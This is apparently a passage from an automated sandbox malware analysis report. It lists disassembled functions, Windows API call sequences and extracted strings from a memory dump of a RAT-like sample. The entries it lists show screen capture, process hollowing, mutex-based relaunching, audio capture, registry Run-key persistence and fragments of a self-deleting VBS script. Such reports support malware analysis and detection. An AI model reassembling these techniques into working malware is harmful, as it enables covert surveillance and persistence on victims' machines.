                                                                                                                        • Opcode Fuzzy Hash: b5ca945c73f96586680b794a2cfc8b55e8f7bc2f58380cec5295694457d85c5e
                                                                                                                        • Instruction Fuzzy Hash: 4E323621D2AF014DE7639634C862336A649AFB73C5F19D737F81AB5AA6EB2CC4C34105
                                                                                                                        Function 0041E5DF Relevance: .6, Instructions: 606COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: f36ab663cb4d239ef1e0a5f108238eabc662f1d3d061ede5d5b4150ec9228ddd
                                                                                                                        • Instruction ID: 2a34495ee4f42e5442afe8381c33b9994a027dd0bc8bc0cc3fe6fc4803c66e78
                                                                                                                        • Opcode Fuzzy Hash: f36ab663cb4d239ef1e0a5f108238eabc662f1d3d061ede5d5b4150ec9228ddd
                                                                                                                        • Instruction Fuzzy Hash: 9732C1796087469BD714DF2AC4807ABB7E1BF84304F444A2EFC958B381D778DD858B8A
                                                                                                                        Function 004267CB Relevance: .4, Instructions: 437COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 51f8d9063bc82676a5307432183369734bf664b3393a643c02daa012ce37ec01
                                                                                                                        • Instruction ID: 022d1978040d43b7ea9bbfc0a41ffb8b00617051ae00cac38c3f572af68edcce
                                                                                                                        • Opcode Fuzzy Hash: 51f8d9063bc82676a5307432183369734bf664b3393a643c02daa012ce37ec01
                                                                                                                        • Instruction Fuzzy Hash: 0D028F717046518FD318CF2EE880536B7E1AF8E301B46863EE585C7395EB74E922CB95
                                                                                                                        Function 00426254 Relevance: .4, Instructions: 377COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 74e588301cf54894560b91a60f0e3518b6bdc06a9ff6f3e52f80e31c4ce3b340
                                                                                                                        • Instruction ID: dd4ce2a6fae4266494c2f053a510589cf36d02151b1693af83bcfdcd1697f2cb
                                                                                                                        • Opcode Fuzzy Hash: 74e588301cf54894560b91a60f0e3518b6bdc06a9ff6f3e52f80e31c4ce3b340
                                                                                                                        • Instruction Fuzzy Hash: 55F13B716142548FC314DF1DE89187BB3E0EB8A301B460A2EF5C2D7392DB78E91ADB56
                                                                                                                        Function 00431377 Relevance: .4, Instructions: 371COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 7363a9fedaeb76f2bf31ad894624b0994c444190ff40f401d8ef5418a52334f3
                                                                                                                        • Instruction ID: a134442df30985c3d9ded0ed06b90328dea8838589cb671b1bd0994677c35241
                                                                                                                        • Opcode Fuzzy Hash: 7363a9fedaeb76f2bf31ad894624b0994c444190ff40f401d8ef5418a52334f3
                                                                                                                        • Instruction Fuzzy Hash: 60D1A171A083158BC721DE29C88096FB7E4FFD8354F446A2EF88597361EB38DD058B86
                                                                                                                        Function 0041D071 Relevance: .3, Instructions: 276COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: e7326b31f45d4e50c8c50174bee11f9882207dfed74e31d12f4697374e1987de
                                                                                                                        • Instruction ID: 86422b113df266cbb8d28aa4d41e6099a1760efb4c6ea83322c03ecd969c618c
                                                                                                                        • Opcode Fuzzy Hash: e7326b31f45d4e50c8c50174bee11f9882207dfed74e31d12f4697374e1987de
                                                                                                                        • Instruction Fuzzy Hash: 46B1817951429A8ACB05EF28C4913F63BA1EF6A300F4851B9EC9CCF757D3399506EB24
                                                                                                                        Function 0043D098 Relevance: .2, Instructions: 237COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: dcaaf3a538fb6447e3283ddd15f45a67438a23807e0f4513107e056d33e47a72
                                                                                                                        • Instruction ID: 3f92c48b0efc6548e9d2ace3e3fdbc0fca8b075b553eb95927f683fa27391a83
                                                                                                                        • Opcode Fuzzy Hash: dcaaf3a538fb6447e3283ddd15f45a67438a23807e0f4513107e056d33e47a72
                                                                                                                        • Instruction Fuzzy Hash: A4613471E0070867DE385928B896BBF23A8AB0D708F24755BE942DB381D65DDD43C24E
                                                                                                                        Function 0043C9DD Relevance: .2, Instructions: 214COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                                                                                                        • Instruction ID: 61f6cd4e2a94a36a6652522188f48ed2bcd63c305fdb574287b7df62abf21a4e
                                                                                                                        • Opcode Fuzzy Hash: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                                                                                                        • Instruction Fuzzy Hash: BB51677170460D9BDB34E96894E77BFA3899B0E344F18350BD882B7382D60CED02939E
                                                                                                                        Function 00426FAD Relevance: .2, Instructions: 186COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6f0963373f33ef73dbd289fc78ad1b7818d684b7f305e862658b304cf2148f24
                                                                                                                        • Instruction ID: 42e819d74c2f676ea4fb49a2469d6a41ac5eaf2d1859dcf64078451750f97267
                                                                                                                        • Opcode Fuzzy Hash: 6f0963373f33ef73dbd289fc78ad1b7818d684b7f305e862658b304cf2148f24
                                                                                                                        • Instruction Fuzzy Hash: 49614E32A083119FC308DF35E581A5BB7E5FFDC718F550E1EF48996151E674EA088B8A
                                                                                                                        Function 00417F9F Relevance: 51.1, APIs: 28, Strings: 1, Instructions: 324windowmemoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00417FB9
                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00417FC4
                                                                                                                          • Part of subcall function 00418452: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00418482
                                                                                                                        • CreateCompatibleBitmap.GDI32(?,00000000), ref: 00418045
                                                                                                                        • DeleteDC.GDI32(?), ref: 0041805D
                                                                                                                        • DeleteDC.GDI32(00000000), ref: 00418060
                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 0041806B
                                                                                                                        • StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 00418093
                                                                                                                        • GetIconInfo.USER32(?,?), ref: 004180CB
                                                                                                                        • DeleteObject.GDI32(?), ref: 004180FA
                                                                                                                        • DeleteObject.GDI32(?), ref: 00418107
                                                                                                                        • DrawIcon.USER32(00000000,?,?,?), ref: 00418114
                                                                                                                        • BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00660046), ref: 00418144
                                                                                                                        • GetObjectA.GDI32(?,00000018,?), ref: 00418173
                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000028), ref: 004181BC
                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000001), ref: 004181DF
                                                                                                                        • GlobalAlloc.KERNEL32(00000000,?), ref: 00418248
                                                                                                                        • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041826B
                                                                                                                        • DeleteDC.GDI32(?), ref: 0041827F
                                                                                                                        • DeleteDC.GDI32(00000000), ref: 00418282
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00418285
                                                                                                                        • GlobalFree.KERNEL32(00CC0020), ref: 00418290
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00418344
                                                                                                                        • GlobalFree.KERNEL32(?), ref: 0041834B
                                                                                                                        • DeleteDC.GDI32(?), ref: 0041835B
                                                                                                                        • DeleteDC.GDI32(00000000), ref: 00418366
                                                                                                                        • DeleteDC.GDI32(?), ref: 00418398
                                                                                                                        • DeleteDC.GDI32(00000000), ref: 0041839B
                                                                                                                        • DeleteObject.GDI32(?), ref: 004183A1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Delete$Object$AllocCreateGlobal$CompatibleFreeIconLocal$BitmapBitsDisplayDrawEnumInfoSelectSettingsStretch
                                                                                                                        • String ID: DISPLAY
                                                                                                                        • API String ID: 1765752176-865373369
                                                                                                                        • Opcode ID: cbbf896b03214424dbec6bf0bb467f1930cc53c9a426e4046c46faf51280246d
                                                                                                                        • Instruction ID: f05cd178694609e891ba83f5bdf02bb76ea447df34f4969275af8919d08089d1
                                                                                                                        • Opcode Fuzzy Hash: cbbf896b03214424dbec6bf0bb467f1930cc53c9a426e4046c46faf51280246d
                                                                                                                        • Instruction Fuzzy Hash: 12C17C31508345AFD3209F25DC44BABBBE9FF88751F04082EF989932A1DB34E945CB5A
                                                                                                                        Function 00417245 Relevance: 49.3, APIs: 22, Strings: 6, Instructions: 290libraryloaderthreadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 0041728C
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041728F
                                                                                                                        • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 004172A0
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 004172A3
                                                                                                                        • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 004172B4
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 004172B7
                                                                                                                        • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004172C8
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 004172CB
                                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0041736C
                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00417384
                                                                                                                        • GetThreadContext.KERNEL32(?,00000000), ref: 0041739A
                                                                                                                        • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004173C0
                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00417440
                                                                                                                        • TerminateProcess.KERNEL32(?,00000000), ref: 00417454
                                                                                                                        • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041748B
                                                                                                                        • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00417558
                                                                                                                        • SetThreadContext.KERNEL32(?,00000000), ref: 00417575
                                                                                                                        • ResumeThread.KERNEL32(?), ref: 00417582
                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041759A
                                                                                                                        • GetCurrentProcess.KERNEL32(?), ref: 004175A5
                                                                                                                        • TerminateProcess.KERNEL32(?,00000000), ref: 004175BF
                                                                                                                        • GetLastError.KERNEL32 ref: 004175C7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                                                                                        • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$`#v$ntdll
                                                                                                                        • API String ID: 4188446516-108836778
                                                                                                                        • Opcode ID: 42c1c999d1834e7e824fdbb4d1330a48ff0e689257c4ebc4fb7692fa9ae4ea32
                                                                                                                        • Instruction ID: f03761d26bac9a2bfb1ad98f85ac7da09ef0bd98ba300517d6d91d37beebd467
                                                                                                                        • Opcode Fuzzy Hash: 42c1c999d1834e7e824fdbb4d1330a48ff0e689257c4ebc4fb7692fa9ae4ea32
                                                                                                                        • Instruction Fuzzy Hash: EEA17C71508304AFD7209F65DC45B6B7BF9FF48345F00082AF689C2661E775E984CB6A
                                                                                                                        Function 004112B5 Relevance: 43.9, APIs: 17, Strings: 8, Instructions: 189synchronizationsleepfileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000001,00000000,004742F8,?,00000000), ref: 004112D4
                                                                                                                        • ExitProcess.KERNEL32 ref: 0041151D
                                                                                                                          • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                                          • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                                          • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                                                          • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 0041135B
                                                                                                                        • OpenProcess.KERNEL32(00100000,00000000,T@,?,?,?,?,00000000), ref: 0041136A
                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 00411375
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 0041137C
                                                                                                                        • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 00411382
                                                                                                                          • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                          • Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                                          • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                                        • PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 004113B3
                                                                                                                        • GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 0041140F
                                                                                                                        • GetTempFileNameW.KERNEL32(?,temp_,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00411429
                                                                                                                        • lstrcatW.KERNEL32(?,.exe,?,?,?,?,?,?,?,00000000), ref: 0041143B
                                                                                                                          • Part of subcall function 0041B58F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,0040A009,?,00000000,00000000), ref: 0041B5EB
                                                                                                                          • Part of subcall function 0041B58F: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040A009,?,00000000,00000000), ref: 0041B5FF
                                                                                                                          • Part of subcall function 0041B58F: CloseHandle.KERNEL32(00000000,?,0040A009,?,00000000,00000000), ref: 0041B60C
                                                                                                                        • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00411483
                                                                                                                        • Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 004114C4
                                                                                                                        • OpenProcess.KERNEL32(00100000,00000000,?,?,?,?,?,00000000), ref: 004114D9
                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 004114E4
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 004114EB
                                                                                                                        • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 004114F1
                                                                                                                          • Part of subcall function 0041B58F: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041B6A5,00000000,00000000,?), ref: 0041B5CE
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExecuteExistsExitMutexNamePointerQueryShellSleepWritelstrcat
                                                                                                                        • String ID: .exe$0DG$@CG$T@$WDH$exepath$open$temp_
                                                                                                                        • API String ID: 4250697656-2665858469
                                                                                                                        • Opcode ID: c80fabc7b58b6664533cdc435cbe53a9781b5ca893f5b0e43887563f66929a29
                                                                                                                        • Instruction ID: b1cd6038c3dd2fca16f1d1fb39a824579eeb1b45f376adef666059b0b2e54ae4
                                                                                                                        • Opcode Fuzzy Hash: c80fabc7b58b6664533cdc435cbe53a9781b5ca893f5b0e43887563f66929a29
                                                                                                                        • Instruction Fuzzy Hash: D751B671A043156BDB00A7A0AC49EFE736D9B44715F1041BBF905A72D2EF7C8E828A9D
                                                                                                                        Function 0040C28E Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 282registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                                          • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040C38B
                                                                                                                        • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C39E
                                                                                                                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040C3B7
                                                                                                                        • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040C3E7
                                                                                                                          • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_000099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                                                          • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                                                          • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_00009993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                                                          • Part of subcall function 0041B58F: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041B6A5,00000000,00000000,?), ref: 0041B5CE
                                                                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C632
                                                                                                                        • ExitProcess.KERNEL32 ref: 0040C63E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                                        • String ID: """, 0$")$@CG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                                                                                        • API String ID: 1861856835-3168347843
                                                                                                                        • Opcode ID: 30a7f1232d58b3c75cebc1c3b5ae0731fe694418f196ddfec79bbb146588a510
                                                                                                                        • Instruction ID: c8b5e11b4abf5c95f8ab28b2bb359051ef64700817c412cd349ec45860bdb676
                                                                                                                        • Opcode Fuzzy Hash: 30a7f1232d58b3c75cebc1c3b5ae0731fe694418f196ddfec79bbb146588a510
                                                                                                                        • Instruction Fuzzy Hash: EB9175316042005AC314FB25D852ABF7799AF91718F10453FF98A631E2EF7CAD49C69E
                                                                                                                        Function 0040BF04 Relevance: 40.5, APIs: 6, Strings: 17, Instructions: 260registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                                          • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C013
                                                                                                                        • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C026
                                                                                                                        • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C056
                                                                                                                        • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C065
                                                                                                                          • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_000099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                                                          • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                                                          • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_00009993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                                                          • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,76233530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
                                                                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C280
                                                                                                                        • ExitProcess.KERNEL32 ref: 0040C287
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                                        • String ID: ")$.vbs$@CG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                                                                                                        • API String ID: 3797177996-1998216422
                                                                                                                        • Opcode ID: d60b2599d57a11e7628afaf08605114e6dbdd8ff5cc87fa28741f108f7a6499c
                                                                                                                        • Instruction ID: 1063ce1f4075510d90626cdc8b34ac690c3cf2dc76fa2c9c3337a4c1feab76e8
                                                                                                                        • Opcode Fuzzy Hash: d60b2599d57a11e7628afaf08605114e6dbdd8ff5cc87fa28741f108f7a6499c
                                                                                                                        • Instruction Fuzzy Hash: B78191316042005BC315FB21D862ABF77A9ABD1308F10453FF586A71E2EF7CAD49869E
                                                                                                                        Function 0041A1BB Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 180synchronizationCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041A2B2
                                                                                                                        • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041A2C6
                                                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00465554), ref: 0041A2EE
                                                                                                                        • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00473EE8,00000000), ref: 0041A2FF
                                                                                                                        • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041A340
                                                                                                                        • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041A358
                                                                                                                        • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041A36D
                                                                                                                        • SetEvent.KERNEL32 ref: 0041A38A
                                                                                                                        • WaitForSingleObject.KERNEL32(000001F4), ref: 0041A39B
                                                                                                                        • CloseHandle.KERNEL32 ref: 0041A3AB
                                                                                                                        • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041A3CD
                                                                                                                        • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041A3D7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                                                        • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$>G
                                                                                                                        • API String ID: 738084811-1408154895
                                                                                                                        • Opcode ID: 488289ec40dba372481858aeedb64a88910d805c9ae5a4b7c21143b04d603b6e
                                                                                                                        • Instruction ID: 9d48d6c6e0579c1e833a8367b0d02802659df9f73890df0c3e8ff2b6504ede8e
                                                                                                                        • Opcode Fuzzy Hash: 488289ec40dba372481858aeedb64a88910d805c9ae5a4b7c21143b04d603b6e
                                                                                                                        • Instruction Fuzzy Hash: 9A51C2712443056AD214BB31DC82EBF3B5CEB91758F10043FF455A21E2EE389D9986AF
                                                                                                                        Function 00401BE8 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                                                                        • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401C7E
                                                                                                                        • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401C8E
                                                                                                                        • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401C9E
